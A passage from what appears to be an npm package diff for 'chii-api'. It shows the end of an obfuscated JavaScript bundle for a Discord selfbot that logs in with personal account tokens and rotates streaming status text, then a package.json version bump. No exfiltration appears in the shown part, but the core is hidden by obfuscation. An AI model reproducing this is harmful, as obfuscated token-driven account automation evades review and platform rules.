x20this.getExternal\x20=\x20new\x20GetImage(this.medmwng);\x0a\x20\x20\x20\x20\x20\x20\x20\x20this.medmwng.once(\x27ready\x27,\x20()\x20=>\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20const\x20capitalizedUsername\x20=\x20this.medmwng.user.username.toUpperCase();\x0a\x20\x20\x20\x20\x20\x20\x20\x20console.log(`\x1b[32m【\x20Succeed\x20】${capitalizedUsername}\x20${this.userConfig.applicationId}\x20\x1b[0m\x20`);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.updateStatus();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.statusInterval\x20=\x20setInterval(()\x20=>\x20this.updateStatus(),\x204000);\x0a\x20\x20\x20\x20\x20\x20\x20\x20});\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20const\x20console_error\x20=\x20`โทเค็นผู้ใช้งานที่\x20ApplicationId\x20หมายเลข\x20:\x20${this.userConfig.applicationId}\x20ไม่ถูกต้อง!`;\x0a\x20\x20\x20\x20\x20\x20\x20\x20this.medmwng.login(this.userConfig.token)\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.catch(error\x20=>\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20console.error(console_error);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.handleError(error);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20});\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20handleError(error)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20if\x20(error.message.includes(\x27TOKEN_INVALID\x27)\x20||\x20error.message.includes(\x27DISALLOWED_INTENTS\x27))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20console.error(`Error\x20for\x20ApplicationId\x20${this.userConfig.applicationId}:\x20${error.message}`);\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x20else\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20console.error(`Unexpected\x20error\x20for\x20ApplicationId\x20${this.userConfig.applicationId}:\x20${error.message}`);\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20async\x20updateStatus()\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20try\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20function\x20replacePlaceholders(text,\x20replacements)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20for\x20(const\x20key\x20in\x20replacements)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20text\x20=\x20text.replace(new\x20RegExp(key,\x20\x27i\x27),\x20replacements[key]);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20return\x20text;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20ping\x20=\x20getPing.call(this);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20temperature\x20=\x20getTemperature();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20ramText\x20=\x20getRAMInfo();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20cpuText\x20=\x20getCPUInfo();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20Time\x20=\x20`${getCurrentTime()}`;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20Date\x20=\x20`${getCurrentDay()}`;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20Datee\x20=\x20`${getCurrentDayy()}`;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20SundayThai\x20=\x20`${getCurrentDayThai()}`;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20SundayEG\x20=\x20`${getCurrentDayEG()}`;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20DateEG\x20=\x20`${getCurrentDateEG()}`;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20richPresence\x20=\x20new\x20Discord.RichPresence(this.medmwng)\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.setType(\x27STREAMING\x27)\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.setApplicationId(this.userConfig.applicationId);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20detailReplacements\x20=\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27time:t\x27:\x20Time,\x20//\x20เวลานาที\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27date:n\x27:\x20Date,\x20//\x20ปฎิทินวันที่ตัวเลข\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27date:th\x27:\x20Datee,\x20//\x20ปฎิทินวันที่ภาษาไทย\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27date:eg\x27:\x20DateEG,\x20\x20\x20\x20//\x20แสดงปฎิทินวันที่ภาษาอังกฤษ\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27ping:ms\x27:\x20ping,\x20\x20//\x20ความปิง\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27temp:c\x27:\x20temperature,\x20//\x20ความร้อน\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27ram:g\x27:\x20ramText,\x20\x20//\x20แสดงแรม\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27cpu:g\x27:\x20cpuText,\x20//\x20แสดง\x20CPU\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27day:th\x27:\x20SundayThai,\x20//\x20แสดงวันของไทย\x20จันทร์\x20อังคาร.....\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27day:eg\x27:\x20SundayEG\x20\x20\x20//\x20แสดงวันของอังกฤษ\x20𝐒𝐮𝐧𝐝𝐚𝐲\x20𝐌𝐨𝐧𝐝𝐚𝐲.....\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20};\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20let\x20details\x20=\x20this.userConfig.Details[this.index];\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20details\x20=\x20replacePlaceholders(details,\x20detailReplacements);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(!details.includes(\x27-\x27))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence.setDetails(details);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20let\x20LargeText\x20=\x20this.userConfig.LargeText[this.index];\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20LargeText\x20=\x20replacePlaceholders(LargeText,\x20detailReplacements);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(!LargeText.includes(\x27-\x27))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence.setAssetsLargeText(LargeText);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20let\x20setState\x20=\x20this.userConfig.setState[this.index];\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20setState\x20=\x20replacePlaceholders(setState,\x20detailReplacements);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(!setState.includes(\x27-\x27))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence.setState(setState);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20SetlargeImageLink\x20=\x20this.userConfig.largeImageLinks[this.index];\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20SetsmallImageLink\x20=\x20this.userConfig.smallImageLinks[this.index];\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20images\x20=\x20await\x20this.getImage(SetlargeImageLink,\x20SetsmallImageLink);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(SetlargeImageLink\x20&&\x20!SetlargeImageLink.includes(\x27-\x27))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence.setAssetsLargeImage(images.BIGlargeIMAGE);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(SetsmallImageLink\x20&&\x20!SetsmallImageLink.includes(\x27-\x27))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence.setAssetsSmallImage(images.IMAGE_small);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.setName(details)\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.setURL(this.userConfig.setURL[0])\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20.setStartTimestamp(Date_Time);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20isValidURL\x20=\x20url\x20=>\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20try\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20new\x20URL(url);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20return\x20true;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x20catch\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20return\x20false;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20};\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(this.userConfig.link1\x20!==\x20\x27-\x27\x20&&\x20!this.userConfig.button1.includes(\x27-\x27))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(isValidURL(this.userConfig.link1))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence.addButton(this.userConfig.button1,\x20this.userConfig.link1);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(this.userConfig.link2\x20!==\x20\x27-\x27\x20&&\x20!this.userConfig.button2.includes(\x27-\x27))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20if\x20(isValidURL(this.userConfig.link2))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20richPresence.addButton(this.userConfig.button2,\x20this.userConfig.link2);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.medmwng.user.setActivity(richPresence);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.index\x20=\x20(this.index\x20+\x201)\x20%\x20this.userConfig.largeImageLinks.length;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x20catch\x20(error)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20originalConsoleError\x20=\x20console.error;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20console.error\x20=\x20()\x20=>\x20{\x20};\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20console.error\x20=\x20originalConsoleError;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20//\x20\x20console.error(\x27เกิดข้อผิดพลาดในการอัปเดตสถานะ:\x27,\x20error.message);\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20async\x20getImage(SetlargeImageLink,\x20SetsmallImageLink)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20const\x20images\x20=\x20await\x20this.getExternal.get(this.userConfig,\x20SetlargeImageLink,\x20SetsmallImageLink);\x0a\x20\x20\x20\x20\x20\x20\x20\x20const\x20finallargeImage\x20=\x20images.BIGlargeIMAGE\x20??\x20this.cacheImage.get(SetlargeImageLink);\x0a\x20\x20\x20\x20\x20\x20\x20\x20const\x20finalSmallImage\x20=\x20images.IMAGE_small\x20??\x20this.cacheImage.get(SetsmallImageLink);\x0a\x20\x20\x20\x20\x20\x20\x20\x20if\x20(images.BIGlargeIMAGE)\x20this.cacheImage.set(SetlargeImageLink,\x20images.BIGlargeIMAGE);\x0a\x20\x20\x20\x20\x20\x20\x20\x20if\x20(images.IMAGE_small)\x20this.cacheImage.set(SetsmallImageLink,\x20images.IMAGE_small);\x0a\x20\x20\x20\x20\x20\x20\x20\x20return\x20{\x20BIGlargeIMAGE:\x20finallargeImage,\x20IMAGE_small:\x20finalSmallImage\x20};\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20updateConfig(newConfig)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20this.userConfig\x20=\x20newConfig;\x0a\x20\x20\x20\x20\x20\x20\x20\x20this.index\x20=\x200;\x0a\x20\x20\x20\x20\x20\x20\x20\x20clearInterval(this.statusInterval);\x0a\x20\x20\x20\x20\x20\x20\x20\x20this.updateStatus();\x0a\x20\x20\x20\x20\x20\x20\x20\x20this.statusInterval\x20=\x20setInterval(()\x20=>\x20this.updateStatus(),\x204000);\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20stop()\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20clearInterval(this.statusInterval);\x0a\x20\x20\x20\x20\x20\x20\x20\x20if\x20(this.medmwng.user)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20this.medmwng.user.setActivity(null);\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20this.medmwng.destroy();\x0a\x20\x20\x20\x20}\x0a}\x0alet\x20clients\x20=\x20config.user.map(userConfig\x20=>\x20new\x20MyClient(userConfig));\x0aconst\x20updateClients\x20=\x20newConfig\x20=>\x20{\x0a\x20\x20\x20\x20const\x20newClientIds\x20=\x20newConfig.user.map(user\x20=>\x20user.applicationId);\x0a\x20\x20\x20\x20clients.forEach(client\x20=>\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20if\x20(!newClientIds.includes(client.userConfig.applicationId))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20client.stop();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20console.log(`ผู้ใช้งาน\x20ApplicationId\x20หมายเลข\x20:\x20${client.userConfig.applicationId}\x20ถูกลบออกแล้ว!`);\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20});\x0a\x20\x20\x20\x20const\x20updatedClients\x20=\x20[];\x0a\x20\x20\x20\x20newConfig.user.forEach(userConfig\x20=>\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20const\x20existingClient\x20=\x20clients.find(client\x20=>\x20client.userConfig.applicationId\x20===\x20userConfig.applicationId);\x0a\x20\x20\x20\x20\x20\x20\x20\x20if\x20(existingClient)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20existingClient.updateConfig(userConfig);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20updatedClients.push(existingClient);\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x20else\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20newClient\x20=\x20new\x20MyClient(userConfig);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20updatedClients.push(newClient);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20console.log(`เพิ่มผู้ใช้งานใหม่\x20ApplicationId\x20หมายเลข\x20:\x20${userConfig.applicationId}\x20แล้ว!`);\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20});\x0a\x20\x20\x20\x20clients\x20=\x20updatedClients;\x0a};\x0alet\x20debounceTimeout;\x0afs.watch(config_path,\x20(eventType,\x20filename)\x20=>\x20{\x0a\x20\x20\x20\x20if\x20(eventType\x20===\x20\x27change\x27)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20if\x20(debounceTimeout)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20clearTimeout(debounceTimeout);\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20debounceTimeout\x20=\x20setTimeout(()\x20=>\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20try\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20newConfig\x20=\x20JSON.parse(fs.readFileSync(config_path));\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20config\x20=\x20newConfig;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20updateClients(newConfig);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x20catch\x20(error)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20console.error(\x27เกิดข้อผิดพลาดในการอ่านไฟล์กำหนดค่าที่อัปเดต:\x27,\x20error.message);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20},\x20100);\x0a\x20\x20\x20\x20}\x0a});\x0a','12eQEcGq','2362451QDuwYE','rainbow','544927LMSbUf','35870PFSuCh','1305sepsjl','7BJFGdg','57LMCyuv','53786WYwWFX'];_0x5a74=function(){return _0x9a6be7;};return _0x5a74();}module[_0x16e4da(0x1eb)]=MedmwngCode;function _0xbcb9(_0x286613,_0x1af316){const _0x5a74d1=_0x5a74();return _0xbcb9=function(_0xbcb9d5,_0x1b9766){_0xbcb9d5=_0xbcb9d5-0x1df;let _0x2c80e9=_0x5a74d1[_0xbcb9d5];return _0x2c80e9;},_0xbcb9(_0x286613,_0x1af316);}const gradient=require(_0x16e4da(0x1ed));console[_0x16e4da(0x1df)](gradient[_0x16e4da(0x1e3)](_0x16e4da(0x1f1)));
|
package/package.json
CHANGED
@@ -1,31 +1,30 @@
|
|
1
1
|
{
|
2
2
|
"name": "chii-api",
|
3
|
-
"version": "1.0.
|
4
|
-
"description": "
|
3
|
+
"version": "1.0.5",
|
4
|
+
"description": "Streaming status for Discord accounts",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
7
|
"test": "node index.js"
|
8
8
|
},
|
9
9
|
"repository": {
|
10
10
|
"type": "git",
|
11
|
-
"url": "git+https://github.com/
|
11
|
+
"url": "git+https://github.com/AD-CHII/"
|
12
12
|
},
|
13
13
|
"keywords": [
|
14
|
-
"
|
15
|
-
"
|
14
|
+
"Discord js",
|
15
|
+
"Streaming Discord"
|
16
16
|
],
|
17
|
-
"author": "
|
17
|
+
"author": "Devloper CHII",
|
18
18
|
"license": "ISC",
|
19
19
|
"bugs": {
|
20
|
-
"url": "https://github.com/
|
20
|
+
"url": "https://github.com/AD-CHII/Medmwng-Discord"
|
21
21
|
},
|
22
|
-
"homepage": "https://github.com/
|
22
|
+
"homepage": "https://github.com/AD-CHII/Medmwng-Discord#readme",
|
23
23
|
"dependencies": {
|
24
|
-
"discord.js-selfbot-
|
25
|
-
"discord.js-selfbot-v13": "^3.2.2",
|
24
|
+
"discord.js-selfbot-v13": "^3.3.0",
|
26
25
|
"fs": "^0.0.1-security",
|
27
26
|
"os": "^0.1.2",
|
28
27
|
"path": "^0.12.7",
|
29
|
-
"
|
28
|
+
"gradient-string": "^2.0.2"
|
30
29
|
}
|
31
30
|
}
|